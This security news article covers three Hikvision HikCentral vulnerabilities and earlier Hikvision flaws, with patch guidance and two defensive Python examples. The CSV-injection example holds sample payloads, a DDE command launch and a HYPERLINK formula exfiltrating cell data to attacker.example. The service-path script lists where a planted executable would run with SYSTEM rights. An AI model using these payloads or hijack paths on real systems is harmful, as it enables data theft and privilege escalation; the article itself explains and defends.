Hikvision, a leading provider of video surveillance equipment, has recently disclosed multiple critical security vulnerabilities affecting various versions of its HikCentral product suite. These flaws could allow attackers to execute malicious commands and gain unauthorized administrative access, posing significant risks to organizations utilizing these systems.
Overview of Identified Vulnerabilities
The vulnerabilities, identified as CVE-2025-39245, CVE-2025-39246, and CVE-2025-39247, were reported to the Hikvision Security Response Center (HSRC) by security researchers Yousef Alfuhaid, Nader Alharbi, Eduardo Bido, and Dr. Matthias Lutter.
1. Access Control Bypass (CVE-2025-39247)
This high-severity vulnerability affects HikCentral Professional versions V2.3.1 through V2.6.2 and carries a CVSS v3.1 base score of 8.6. An unauthenticated remote attacker can obtain administrator privileges without any user interaction, which is the worst combination for an internet- or campus-reachable management server.
Technical Details:
The root cause lies in insufficient access control within the web service API endpoints of HikCentral Professional. Certain administrative functions fail to properly verify user authentication tokens, enabling specially crafted HTTP requests to invoke privileged operations.
2. CSV Injection Flaw (CVE-2025-39245)
This medium-severity vulnerability affects HikCentral Master Lite versions V2.2.1 through V2.3.2, with a CVSS score of 4.7. It allows an attacker to place formula-like content (CSV injection, also called formula injection) into CSV data handled by the product, so that cells are interpreted as commands rather than as text when the file is later processed.
Technical Details:
CSV injection works because spreadsheet applications evaluate a cell whose content begins with a character such as =, +, -, or @ as a formula rather than as text. An attacker who gets such a value into a CSV file that a user later imports or opens causes the embedded formula to run in whatever application interprets the file; depending on that application and its settings, the result ranges from data exfiltration through HYPERLINK-style formulas to command execution through DDE or similar mechanisms. A user has to handle the crafted file, which is why the score is medium, and the damage lands wherever the file is interpreted, which may be the workstation of the user who opens it rather than the HikCentral server itself.
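To make the mechanism concrete, here is an added Python example; it is not Hikvision's code and is not tied to the Master Lite code path. It shows how a formula-like value injected into a data field reaches an exported CSV, a scanner that flags such cells before a file is imported or opened, and the neutralisation step a developer applies at export time. The records, field names and the attacker.example host are constructed for illustration.

```python
"""CSV (formula) injection: flag and neutralise formula-like cells.

Added example, not code from Hikvision or HikCentral. The records below
are constructed for illustration.
"""
import csv
import io

# Leading characters that spreadsheet applications interpret as the start
# of a formula. Tab and carriage return are included because some
# applications strip leading whitespace before deciding.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

FIELDNAMES = ["person_id", "name", "department"]

# Constructed sample records. The second and third rows carry classic
# payloads: a DDE-style command launch and a HYPERLINK that sends the
# contents of cell A1 to an attacker-controlled host.
SAMPLE_ROWS = [
    {"person_id": 1001, "name": "Alice Example", "department": "Security"},
    {"person_id": 1002, "name": "=cmd|' /C calc'!A0", "department": "R&D"},
    {"person_id": 1003, "name": "Bob",
     "department": '=HYPERLINK("https://attacker.example/?d="&A1,"Open")'},
]


def is_formula_like(value) -> bool:
    """True if a string cell would be evaluated as a formula when opened."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralise_cell(value):
    """Prefix a formula-like string with a single quote so spreadsheet
    applications treat it as literal text. Non-string values (numbers,
    None) are returned unchanged, so a negative integer stays numeric."""
    if is_formula_like(value):
        return "'" + value
    return value


def export_csv(rows, fieldnames, neutralise=True) -> str:
    """Serialise rows to CSV text. With neutralise=False the output
    reproduces the vulnerable behaviour: user-supplied cells are written
    verbatim. QUOTE_ALL keeps embedded commas, semicolons and quotes from
    splitting a cell in applications that guess the delimiter."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        if neutralise:
            row = {k: neutralise_cell(v) for k, v in row.items()}
        writer.writerow(row)
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Scan CSV text (for example a file about to be imported) and return
    (line_number, field, value) for every formula-like cell. Line 1 is
    the header, so the first data row is line 2."""
    reader = csv.DictReader(io.StringIO(csv_text))
    hits = []
    for line_no, row in enumerate(reader, start=2):
        for field, value in row.items():
            if is_formula_like(value):
                hits.append((line_no, field, value))
    return hits


if __name__ == "__main__":
    raw = export_csv(SAMPLE_ROWS, FIELDNAMES, neutralise=False)
    print("cells that would execute on open:", find_formula_cells(raw))
    print(export_csv(SAMPLE_ROWS, FIELDNAMES))
```

Only string cells are neutralised, so numeric columns keep their sign; free-text columns such as names, departments and notes are where user-controlled input lands and where the prefix belongs. Run find_formula_cells over any CSV before bulk-importing it into a management system, since a file prepared on a compromised workstation is exactly what this class of flaw relies on.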
3. Unquoted Service Path Vulnerability (CVE-2025-39246)
This medium-severity vulnerability affects HikCentral FocSign versions V1.4.0 through V2.2.0, scoring 5.3 on the CVSS scale. It occurs when service executable paths contain spaces but lack proper quotation marks in the service configuration.
Technical Details:
An attacker with local access and write permission to one of the directories along the path can exploit this flaw by placing an executable where Windows looks first. The Windows CreateProcess API resolves an unquoted command line by trying each space-delimited prefix in turn: for C:\Program Files\Vendor\Sub Dir\svc.exe it looks for C:\Program.exe, then C:\Program Files\Vendor\Sub.exe, and only then the real binary. Whichever file it finds first is launched with the service's privileges, often SYSTEM, the next time the service starts. Default ACLs on C:\ and C:\Program Files stop standard users from creating files there, so the practical impact depends on the permissions the installer sets on the vendor's own directories; that, together with the local-access requirement, accounts for the medium score.
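The following added Python example (not Hikvision's code and not derived from the FocSign installer) reproduces the CreateProcess rule on sample ImagePath values, lists the executables Windows would try before the intended one, and, on a Windows host, reads the real ImagePath values from the registry so the same check can be run against every installed service. The service names and paths in SAMPLE_SERVICES are constructed, and "Example Vendor" is a placeholder rather than a real install directory.

```python
"""Unquoted service path analysis.

Added example; not Hikvision's code and not derived from the FocSign
installer. Reproduces the CreateProcess rule that makes an unquoted
ImagePath ambiguous and lists the executables Windows would try first.
The service names and paths in SAMPLE_SERVICES are constructed, and
"Example Vendor" is a placeholder, not a real install directory.
"""
import ntpath
import os
import re
import sys

EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)

# Constructed registry snapshot: service name -> ImagePath value.
SAMPLE_SERVICES = {
    "Dhcp": r"%SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted",
    "ExampleQuoted": r'"C:\Program Files\Example Vendor\Agent Service\agent.exe" --service',
    "ExampleSignage": r"C:\Program Files\Example Vendor\Signage Service\signsvc.exe",
    "ExampleLogger": r"C:\Program Files\Example Vendor\logsvc.exe -log C:\Log Dir\svc.log",
}


def executable_portion(image_path: str) -> str:
    """Everything up to and including the first '.exe'; the rest is treated
    as service arguments, which CreateProcess never reaches once the real
    binary has been found."""
    m = EXE_RE.search(image_path)
    return image_path[: m.end()] if m else image_path


def hijack_candidates(image_path: str) -> list:
    """Paths CreateProcess tries, in order, before the intended executable.

    For an unquoted 'C:\\Program Files\\Sub Dir\\svc.exe' Windows tries
    'C:\\Program.exe', then 'C:\\Program Files\\Sub.exe', then the real
    path. '.exe' is appended only when the prefix has no extension.
    A quoted path, or one with no space in the executable part, is safe."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    exe = executable_portion(path)
    if " " not in exe:
        return []
    tokens = exe.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def triage(services: dict) -> dict:
    """Map each vulnerable service to its hijack candidates."""
    result = {}
    for name, image_path in services.items():
        cands = hijack_candidates(image_path)
        if cands:
            result[name] = cands
    return result


def enumerate_service_image_paths() -> dict:
    """Read every service's ImagePath from the live registry (Windows only).
    REG_EXPAND_SZ values such as %SystemRoot% are expanded on the host."""
    import winreg  # importable only on Windows
    paths = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SYSTEM\CurrentControlSet\Services") as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:
                break  # no more subkeys
            index += 1
            try:
                with winreg.OpenKey(root, name) as svc:
                    value, _ = winreg.QueryValueEx(svc, "ImagePath")
            except OSError:
                continue  # kernel drivers and some entries carry no ImagePath
            paths[name] = os.path.expandvars(str(value))
    return paths


if __name__ == "__main__":
    services = enumerate_service_image_paths() if sys.platform == "win32" else SAMPLE_SERVICES
    for name, cands in triage(services).items():
        print(f"{name}:")
        for c in cands:
            print(f"  Windows would try {c} first")
```

The candidate list tells you exactly which directories matter: if a standard user can create a file in any of their parents (check with icacls on a Windows host), the service is exploitable, otherwise the unquoted path is a latent defect. Wrapping the ImagePath value in double quotes removes the ambiguity entirely, which is what the vendor fix amounts to.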
Summary of Vulnerabilities:
| CVE ID | Title | Affected versions | Fixed in | CVSS 3.1 Score | Severity |
|---|---|---|---|---|---|
| CVE-2025-39245 | CSV Injection in HikCentral Master Lite | V2.2.1 through V2.3.2 | V2.4.0 | 4.7 | Medium |
| CVE-2025-39246 | Unquoted Service Path in HikCentral FocSign | V1.4.0 through V2.2.0 | V2.3.0 | 5.3 | Medium |
| CVE-2025-39247 | Access Control Bypass in HikCentral Professional | V2.3.1 through V2.6.2 | V2.6.3 or V3.0.1 | 8.6 | High |
Mitigation Measures
Hikvision has released security patches addressing all three vulnerabilities. Users are strongly advised to upgrade their systems to the latest versions to mitigate these risks.
Recommended Actions:
– HikCentral Master Lite Users: Upgrade to version V2.4.0.
– FocSign Users: Upgrade to version V2.3.0.
– HikCentral Professional Users: Install either V2.6.3 or V3.0.1 to remediate the severe access control bypass vulnerability.
Organizations should prioritize patching CVE-2025-39247: it is exploitable remotely without credentials and yields administrator access. Until the update is applied, restrict access to the HikCentral Professional web interface to management networks and known operator hosts; keeping surveillance management servers on a segmented network also limits how far a compromised server can reach afterwards.
Additional Security Concerns
Beyond the aforementioned vulnerabilities, Hikvision products have been subject to other significant security issues:
1. Critical Flaw in Hikvision Video Storage (CVE-2023-28808)
An access control vulnerability in Hikvision’s Hybrid SAN/Cluster storage products allows threat actors to obtain admin permissions by sending specially crafted messages to affected devices. This flaw carries a CVSS score of 9.1.
Affected Versions:
– DS-A71024/48/72R: V2.3.8-8 and earlier
– DS-A71024/48R-CVS: V1.1.4 and earlier
Mitigation:
Hikvision has released updates for all vulnerable devices. Users are advised to follow the provided upgrade instructions carefully.
2. Hikvision Network Camera Flaw Exposing DDNS Credentials
A critical security flaw in Hikvision network cameras allows attackers to intercept Dynamic DNS (DDNS) credentials transmitted in cleartext, potentially exposing thousands of devices to unauthorized access.
Affected Models:
– DS-2CD1xxxG0: Versions prior to V5.7.23 build241008
– DS-2CD2xx1G0: Versions prior to V5.7.23 build241008
– DS-2CD3xx1G0: Versions prior to V5.7.23 build241008
Mitigation:
Hikvision has released firmware updates to address this issue, modifying the cameras to communicate exclusively via HTTPS for DDNS services. Users are strongly recommended to update to the latest firmware immediately.
3. Hikvision Camera Driver Vulnerability (CVE-2024-12569)
A vulnerability in the Hikvision camera driver shipped in Milestone's XProtect® Device Pack causes sensitive authentication details to be written to plain-text log files when an authentication attempt fails. The flaw has a CVSS v4.0 score of 5.2.
Affected Versions:
– XProtect Device Pack: Versions 13.4a and earlier
Mitigation:
Milestone has released an updated device pack to address the issue. Users should update, review existing log files for credentials that were already written, and rotate any camera credentials found there, since log files are typically collected and shared far more widely than credential stores.
Conclusion
The discovery of these vulnerabilities underscores the critical importance of maintaining up-to-date security measures for surveillance systems. Organizations utilizing Hikvision products should promptly apply the recommended updates and implement robust security practices to safeguard their infrastructure against potential threats.